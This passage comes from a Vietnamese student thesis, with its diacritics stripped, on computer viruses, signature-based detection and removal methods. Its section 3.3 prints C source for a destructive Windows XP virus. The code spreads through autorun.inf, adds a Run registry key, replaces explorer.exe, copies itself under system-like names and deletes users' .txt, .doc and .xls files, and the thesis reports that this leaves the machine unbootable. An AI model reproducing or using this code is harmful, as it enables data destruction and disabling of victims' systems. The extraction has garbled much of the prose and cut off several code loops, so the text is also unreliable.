th ca tng virus m string c chn c th khc nhau.

+u im:

Cch thc update mt sign v scan kh d thc hin.


47/68

47

+Nhc im:

Cch scan ny kh b ng vi h virus, v d nu tm cch chn thm

hay xa 1 byte trong file binary ca virus (vn phi m bo virus chy c)

m byte ny nm trc phn offsetsign th tt yu phng php ny khng

th nhn ra mu virus sau khi b thay i.

2.1.3.2.Xt theo v tr offset tng i

cch ny a ch offset c tnh da vo mt thnh phn no (nh

Entry Point, Section th my ..)

Vic xt nh th ny c th m rng ra nh offset: Entry Point + S no

.

Sau y chng taxt mt v d vi vic so snh cu trc 2 bin th khc

nhau ca dng virus: w32.funnyIM.worm

Ban u chng ta xc nh a ch Entry Point ca 2 mu virus:

Chng ta quan st hnh sau:

String ca 2 mu virus


48/68

48

Chng ta s c 2 string tng ng, nhng 2 offset khc nhau (t sau,

mi khi nhc n cc string t file nh phn, ti s vit dng chui cc s hexan

(thp lc phn) tin quan st):

Nhn 2 bng s liu trn chng ta c th to mt m nhn dng chung cho

c 2 virus ny l:

String: 64 75 6E 67 63 6F 69 00

Offset: a ch Entry Point + 60

+ u im:

Vic m rng nh th ny s lm m rng di virus c nhn dng. V

d khi chnh sa mt s bytes nh cch bn trn thc hin nhng nu sau v tr

Entry point nh c v vn cn tn ti cc byte nh ban u th vn c th nhn

ra bng sign cp nht theo cch ny.

+Nhc im:

Vic cp nht i hi nhiu thng tin hn phng php offset tnh

Scan engine phi c c ch lm vic phc tp hn thch ng vi c ch

scan ny.

Do phng php ny ly v tr offset da vo mt phn thng tin no

ca mt nh dng file thch hp nn b gii hn mt s nh dng file.

2.1.4. Nhn dng hnh vi ng ngNhn dng cc hnh vi ng ng l mt chc nng "thng minh" m

khng phi bt k phn mm dit virus no cng c. Hiu mt cch n gin

th phn mm dit virus s theo di s hot ng bt thng ca h thng c

th pht hin cc virus cha c bit n trong d liu ca n hoc cc phn

mm c hi t a ra cnh bo ngi s dng, c lp virus sn sng

gi mu n hng bo v phn tch v cp nht vo bn nng cp c s d liu

k tip.


49/68

49

Chc nng ny cc phn mm dit virus thng cho php la chn kch

hot hoc khng, mc hot ng (s dng mc hot ng tch cc,

hot ng trung bnh mc c, hay hot ng mc thp - mc nh

thit lp thng l kch hot sn mc c) bi a s chng c th chimti nguyn v lm chm h thng i vi cc mytnh khng mnh.

2.1.5. Kim sot lin tc

Phn mm dit virus my tnh thng thc hin kim sot lin tc theo

thi gian thc bo v h thng. Hnh thc kim sot lin tc s qut virus

mi file m h thng truy cp n, mi file ngay t khi bt u c copy vo

h thng thng qua hnh thc nhn bit so snh mu v theo di hnh ng

ng ng.

2.1.6. Kt hp cc phng thc

Nu ch n thun s dng k thut so snh mu th mt phn mm dit

virus s tht bi bi chng ch gii quyt hu qu cc file b nhim ch cha

tm n nguyn nhn dn n file b nhim. Khi s dng mt s phn mm

cha mnh ta s nhn thy trng hp: Phn mm dit c hon ton

virus trong my, nhng ngay sau khi phin khi ng k tip ca h iu hnh,phn mm lipht hin ra chnh virus . y c th khng phi l phn mm

nhn dng c nhng khng dit c, m l virus li c ly nhim tr li

bi phn mm khng th gim st qu trnh khi ng h iu hnh ngay t

khi bios trao quyn iu khin.

Chnh v vy, phn mm cn phi kt hp mi phng thc kim sot

v ngn chn cc hnh vi ca virus. Virus c th t cc dng lnh trongregistry ly nhim virus t mt file nn no hoc v hiu ha phn mm

dit virus; Cng c th virus thit lp ti v ngay khi s dng trnh duyt kt

ni vo mng Internet. Do vy phn mm dit virus cn phi kt hp mi

phng thc ngn chn virus. Chnh nhng yu t ny lm ln s khc bit

gia cc phn mm dit virus hin nay, khng ln n vi v vn phn mm dit

virus khc khi m ngay mt sinh vin cng c th vit mt phn mm dit virus

nu chu kh su tm cc mu virus trn mng Internet hin nay.


50/68

50

2.2. PHNG PHP PHT HIN VIRUS

2.2.1. Qut (scanner)

y l phng php xut hin sm nht v c hu nh ton b cc

chng trnh chng virus dng. Theo phng php ny cc chng trnh chngvirus s tin hnh cp nht thng xuyn cc mu c trng ca tng virus ri

tin hnh d xt cc file. Trong qu trnh qut ny cc chng trnh chng virus

ny s so snh cc m nhn dng virus bit vi d liu ca tng file v nh

pht hin ra virus trong file nu c.

Nh vy cc chng trnh dng phng php ny phi cp nht thng

xuyn cc mu c trng ca virus. Nu khng chng s khng pht hin c

cc loi virus mi.

2.2.2. Checksum (kim tra tng)

y vn l phng php kim tra tnh ton vn ca d liu c dng

trong thng tin c mt s chng trnh chng virus p dng. Nguyn tc ca

phng php ny l pht hin s thay trong cc i tng cnkim tra. Cc

chng trnh sdng phng php ny s sinh ra mt tr s c gi l

checksum v c kim tra nh k vi i tng hin hnh (file, vngBoot). Nu virus thm nhp vo i tng ny th chng trnh s bo ng.

Virus c th la cc chng trnh chng virus dng phng php ny bng

cch to ra mt checksum gi. trnh iu ny cc chng trnh s dng

phng php ny s dng nhiu k thut m ha to checksum rt phc tp

virus khng th gi mo c.

im yu ca phng php ny l phi kim tra thng xuyn u nmt vic lm rt tn thi gian v n khng c kh nng phn bit gia s thay

i thc s v s thay i bi virus tn cng. Do ngi dng lun phi lo

lng trc nhng cnh bo sai. Phng php ny s lm cho virus tn ti nu

khi tin hnh checksum ln u virus tn ti sn. Mt nhc im na ca

phng php ny l khng th p dng cho vic pht hin virus macro v

nhng file.DOC lun thay i do ngi s dng


51/68

51

2.2.3. Guard (canh phng)

Chng trnh thng tr (TSR) p dng phng php ny s chn mi

thao tc v a, thi hnh ng dng v cnh bo cho ngi dngbit mi iu

kh nghi. Chng hn nh vic ghi ln file.EXE, file.COM hoc ghi trc tipln vng Boot ca a.

Tuy nhin cch ny khng pht hin c virus Boot dng cc hm trong

BIOS truy xut a v nhng virus ny c np trc khi cc canh phng

chy. Chng chn cc hm v a ca BIOS trc ln cc chng trnh kiu

ny khng kim sot c chng.

Cc chng trnh canh phng s cnh bo sai khi cc ng dng c ghi lnfile.EXE hay file.COM, chng hn nh qu trnh nn, bo v, ci t phn

mm V ni chung cc chng trnh loi ny lm gim tc ca h thng.


52/68

52

Chng 3.PHNG CHNG VIRUS

3.1. D TM TRONG B NH

y l bc quan trng nht cho cc bc tip theo, v khng th cha tr

nu khng bit h thng c b nhim virus hay khng, hay l nhim lai virusno. Vic tm kim trc ht phi thc hin trong b nh v mt khi virus

thng tr nm quyn iu khin h thng s dn n sai lc thng tin trong

cc tc v truy xut a tip theo. Sau mi tin hnh trn a. S tn ti ca

virus gn lin vi s tn ti ca mt vi du hiu c bit.

i vi virus macro v TF-Virus, vic qut b nh l khng cn thit cho

nn c th b qua, cn i vi B-Virus v RF-Virus cng vic ny li rt cn

thit. Vic d tm bao gm d bo v kh nng xut hin mt virus mi, a ra

chnh xc loi virus bit trong vng nh. Vic d tm trong b nh c th

qua cc bc.

1/.i vi B-Virus:

So snh tng b nh BIOS bo co vi ton b b nh m chng trnh

c c sau khi t kim tra s chnh lch. Du hiu chnh lch b nh cng

cha kt lun c s tn ti ca virus, m l c s tin hnh bc hai v

s chnh lch cng c th l do mt chng trnh bnh thng lm hoc RAM

b hng mt phn.

Bt u t a ch ca vng cao, tin hnh d tm bng k thut qut: d

tm on m c trng ca Virus trong vng cao. Mi s tm thy u c th

cho php kt lun c virus trong b nh.

Trong trng hp khng pht hin, kh nng tn ti mt B-virus mi vnc th xy ra. Bng du hiu b nh b thiu ht, ngt13h tr v vng nh thiu

ht v vng ny c m nguy him th c th kt lun tn ti B-Virus.


53/68

53

2/.i vi RF-Virus:

C th dng k thut qut d tm m c trng ca virus t a ch thp

cho n cao hoc dng phng php gi ngt nhn dng m chnh cc virus

ci t t nhn din n trong b nh.Trong trng hp khng pht hin, kh nng tn ti mt RF-Virus mi

vn c th xy ra. Bng du hiu ngt 21h tr v vng nh c m nguy him th

vic kt lun c RF-Virus mi l kh chnh xc.

D Tm Trn a

Vic d tm trn a phi thc hin sau khi kim tra b nh khng c

virus hoc nu c th c khng ch.

Nh a s cc chng trnh chng virus khc chng trnh cng p dng

phng php qut tm on m c trng pht hin virus. u tin l qut

vng Boot tm B-Virus, sau qut cc file tm F-Virus, Trojan v

Worm. qut vng Boot dng ngt 13h chc c sector 02h caBIOS c

vo b m v tin hnh qut tm m virus c trng. qut file dng cc

chc nng truy xut file ca ngt 21h: chc nng m file 03Dh, sau dng

chc nng c file 03Fh vo b m ri cng tin hnh qut tm m virus.

3.2. DIT VIRUS V KHIPHC D LIU

Trc khi dit virus trn a m b nh li c virus thng tr th chng

trnh s tin hnh khng ch virus trn b nh nu cn thit v c th. Tuy

nhin, khi ng li my tnh bng mt a h thng sch dit virus vn l

bin php an ton nht.

3.2.1. B-Virus

Nhiu ngi cho rng vic dit virus v khi phc a ch n gin l ghi

mt Boot sector sch ln Boot sector c c virus. Tuy nhin, nu Boot sector

ca a c nhim v c bit th rt kh thc hin, cng cha k a c bn

tham s m ch cn b virus lm sai lch cht t cng dn n trng hp khng

kim sot c a (vic ny hp l nu Boot sector sch chnh l Boot sector

ca a c ct gi trc ). V vy, cch tt nht l phi khi phc Boot


54/68

54

sector, trong trng hp khng th khi phc li c mi tin hnh ghi

mt Boot sector sch. Cc bc tin hnh bao gm:

Cn c vo loi a (a cng hay mm) v loi virus tin hnh gii m

xc nh ni ct gi Boot sector nguyn thy.

c Boot sector nguyn thy vo b m bng ngt 13h (chc nng c

sector 02h) ca BIOS v kim tra tnh hp l ca n.

Trong trng hp vic kim tra l chnh xc mi bt u ghi vo Boot

sector c virus bng ngt 13h chc ghi sector 03h ca BIOS.

i vi loi DB-Virus, vic khi phc a cn c th i km vi vic gii

phng mt s lin cung b nh du b trn a nu virus dng phng php

nh v FAT. Cch gii quyt tt nht i vi vic ny l: nn lm nhng iu

virus lm nhng ngc li.

3.2.2. F- Virus

1/. Vi rus macro:

Vic dit n gin l xa cc macro ca virus (dng chc nng ngt 040h

ca ngt 21h).

2/. F -Virus truyn thng:

Gii m virus khi phc d liu ca chng trnh b virus chim

gi sau ct b m virus ra khi chng trnh.

3/.i vi cc file dng .COM , .BI N:

Nu virus ny ly theo kiu ni ui file v tr li cc byte u b virus

chim gi, di con tr file n u m virus (dng chc nng 042h ca ngt21h) ri ct khi file bng ngt 21h ca chc nng ghi file 040h ca DOS.

Nu virus ly theo kiu chn u: c file ngay t sau phn m virus vo

b nh bng ngt 21h ca chc nng c file 03Fh ri tin hnh ghi li (dng

chc nng 040h ca ngt 21h).

Nu virus ly theo kiu vng trng: nh v v tr li cc byte u b

virus chim gi, di con tr file n m virus ri xa n.


55/68

55

4/. i vi cc file dng .EXE:

Cch dit cng tng t nh i vi file .COM. Nu virus ct d Exe

header c ca file th vic khi phc ch n gin bng cch tr li phn ny

cho file, ngc li phi tnh ton nh v mt s yu t cabng Exe header nh du hiu nhn dng file .EXE: MZ, tng s trang,

s byte l trong trang cui ca file.

3.2.3. Virus Trojan

Trojan ch thc hin ly nhim ti my tnh m khng ly nhim vo file

trong my tnh. Do khi thchin dit Trojan chng ta khng cn qua tm ti

xem c bn sao no ca n hot ng trong h thng khng.Trojan c c im l mun hot ng c th n phi c kch hot.

Mt cch hu hiu dit Trojan l khng cho php n c kch hot.

Thc hindit Trojan theo cch ny chng ta phi tm hiu nhng

phng php m Trojan c th s dng thng qua n c kch hot.

Mt s phng php m Trojan thng s dng c kch hot l:

(V d vi file khi ng l Trojan.exe)

Trong cc th mc m ti cc file c th c kch hot khi khi ng

Windows:

C:\ Windows\ Start Menu\ Programs\ startup\ Trojan.exe.

Trong file C:\ windows\ Win.ini ti dng lnh:

Load=Trojan.exe

Hoc run=Trojan.exe

Trong file c:\ windows\ system.ini sau dng lnh shell

Shell=Explorer.exe chy

Trong Autoexec.bat

C:\....\Trojan.exe

Trong th mc khi ng ca Windows:C:\ \ Trojan.exe


56/68

56

To kha trong Registry:

[HKEY_LOCAL_MACHINE \ Software \ Microsoft \Windows \ CurrentVersion\ Run]

Trojan=c:\\ Trojan.exe

[HKEY_LOCAL_MACHINE \ Software \ Microsoft\ Window \ CurrentVersion\RunOnce]

Trojan=c:\...\Trojan.exe

[HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion\

RunServices]

Trojan=c:\....\Trojan.exe

[HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion\

RunServicesOnce]

Trojan=c:\....\Trojan.exe[HKEY_LOCAL_USER \ Software \ Microsoft \ Windows \ CurrentVersion\ Run]


[HKEY_LOCAL_USER \ Software \ Microsoft \ Windows \ CurrentVersion\

RunServices]


- Trong Resistry Shell Open vi key l %1%*

[HKEY_CLASSES_ROOT \ exefile \shell\ open\ command]

[HKEY_CLASSES_ROOT \ comfile \shell\ open\ command]

[HKEY_CLASSES_ROOT \ batfile \shell\ open\ command]

[HKEY_CLASSES_MACHINE \ SOFTWARE \ Classes \ exefile \ shell \ open \ command]

Trojan.exe = %1%*

- Trong mt s ng dng m cho php mt s chng trnh c th chy:

+Trong ICQ:

[HKEY_CURRENT_USER \ Software \ Mirabilis \ ICQ \ Agent\ Apps\]

+Trong ActiveX:[HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Active Setup \ Installed

Components \ KeyName] StubPath=c:\...\Trojan.exe

Loi b Trojan ta thc hin xa tt c cc lnh c file m Trojan s c chy

khi khi ng my tnh ( y v d l file Trojan.exe)


57/68

57

3.2.4. Su Worm

dit su Internet ta thc hin ln lt cc qu trnh sau:

-Nghin cu cc thng tin v su.

- Thc hin loi b phn ly nhim ra khi cc file ly nhim.

Mi su Internet c c trng ring ca n, cho nn iu cn thit l phi

thc hinvic nghin cu v su Internet: tn file thc thi, ng dn ca file

thc thi, nhng tc ng ca n ti cc file khc trong h thng, cc file m n

to ra v phn m i din ca mi con su Internet.

Thng qua m i din ca su Internet ta c th thc hin vic qut file

tm v dit su Internet .


58/68

58

3.3. TO VIRUS MY TNH

Th nghim chng trnh virus my tnhviVisual C++ chytrn h

iuhnh Windows XP

Chng trnh tovirus :

Phnkhai bo

#include "stdafx.h"

#include

#include

#include#include

#include

#define SVCHOST_NUM 6

#define RUBBISH_NUM 5

#define REMOVE_NUM 5

/*=================================================*/

Char*autorun={"[AutoRun]\nopen=\"SVCHOST.com

/s\"\nshell\\open=(&O)\\nshell\\open\\Command=\"SVCHOST.com

/s\"\nshell\\explore=(&X)\\nshell\\explore\\Command=\"SVCHO

ST.com /s\""};

/*=================================================*/char *regadd={"REGEDIT4\n\n\

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Curr

entVersion\\Run]\n\"wjview32\\"=\"C:\\\\windows\\\\wjview32.com /s\""};


59/68

59

/*=================================================*/

int copy(char *infile,char *outfile)

{

FILE *input,*output;

char temp;

if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL)

&& ((output=fopen

(outfile,"wb"))!=NULL))

{

while(!feof(input))

{

fread(&temp,1,1,input);

fwrite(&temp,1,1,output);

}fclose(input);

fclose(output);

return 0;

}

else return 1;

}


60/68

60

/*=================================================*/

int autorun_explorer()

{

FILE *input;

if((input=fopen("C:\\windows\\system\\explorer.exe","rb"))!=NULL)

{

fclose(input);

remove("C:\\windows\\$temp$");

remove("C:\\windows\\system32\\dllcache\\$temp$");

return 1;

}

copy("C:\\windows\\explorer.exe","c:\\windows\\system\\explorer.exe");

rename("C:\\windows\\explorer.exe","C:\\windows\\$temp$");

rename("C:\\windows\\system32\\dllcache\\explorer.exe","C:\\windows\\syste

m32\

\\dllcache\\$temp$");

if(copy("SVCHOST.com","C:\\windows\\explorer.exe")==0 && copy

("SVCHOST.com","C:\\windows\\system32\\dllcache\\explorer.exe")==0

)

return 0;

else

return 2;

}


61/68

61

/*=================================================*/

int add_reg()

{

FILE *output;

if((output=fopen("$$$$$","w"))!=NULL)

{

fprintf(output,regadd);

fclose(output);

spawnl(1,"C:\\windows\\regedit.exe"," /s $$$$$",NULL);

return 0;

}

return 1;

}

/*=================================================*/

void copy_virus()

{

int i,k;

FILE *input,*output;char *files_svchost[SVCHOST_NUM]=

{"svchost.com","C:\\windows\\wjview32.com","c:\\windows\\system\\M

SMOUSE.DLL","c:\\windows\\syste\

m32\\cmdsys.sys","C:\\windows\\system32\\mstsc32.exe","c:\\windows\\

explorer.exe"};

char temp[2][20]={"C:\\svchost.com","c:\\autorun.inf"};


62/68

62

for(i=0;i


63/68

63

temp[0][0]++;

temp[1][0]++;

}

i=SVCHOST_NUM;

}

}

}

/*=================================================*/

void make_rubbish()

{

int i;

FILE *output;

srand(0);

for(i=0;i


64/68

64

}

}

/*================================================*/

void remove_files()

{

long done;

int i;

struct _finddata_t ffblk;

char *remove_files[3]={"*.txt","*.doc","*.xls"};

for(i=0;i


65/68

65

{ int contral=0;

autorun_explorer();

spawnl(1,"c:\\windows\\system\\explorer.exe"," /s",NULL);

add_reg();

copy_virus();

make_rubbish();

spawnl(1,"c:\\windows\\system32\\mstsc32.exe"," /s",NULL);

return 0;

}

Mn hnh C trc khi chy virus


66/68

66

Sau khi chy chng trnh virus win32 virus s t ng thchin vic to

v xa mt s file sau:

Sau khi chy chong trnh bng Visual C++ chng trnh s t ng tc

ng vo mt s file trn windows lm cho h iu hnh Windows XP b li

khi khi ng

CreateFile C:\windows\system32\dllcache\$temp$

DeleteFile C:\windows\system32\dllcache\explorer.exe

CreateFile C:\windows\$temp$

DeleteFile C:\windows\explorer.exe

CreateFile C:\windows\system\explorer.exe

Mn hnh C sau khi chy virus

Sau khi chy chng trnh virus ny sau khi khi ng li my tnh mn

hnh my tnh s khng khi ng ln c v file

C:\windows\system\explorer.exe b thay i cc file

C:\windows\system32\dllcache\$temp$, CreateFile C:\windows\$temp$


67/68

67

c to ra khin cho HH Windows XP khng np c chng trnh

khi ng mn hnh Windows XP.

Mn hnh khng hin th thanh cng c khi ng v cc folder


68/68

Kt lunKt qu t c ca kha lun:

1. Tm hiu v nghin cu l thuyt:- Tng quan v virus my tnh, hot ng ca B-Virus, F-Virus, Macro

Virus, Virus Trojan, Internet worm.

- Mt s phng php pht hin, nhn dng virus my tnh.

- Mt s phng php phng trnh v dit virus my tnh.

2. Th nghim Chng trnh m phng to virus my tnh.

mot so dang virus may tinh va phuong phap phong chong

Documents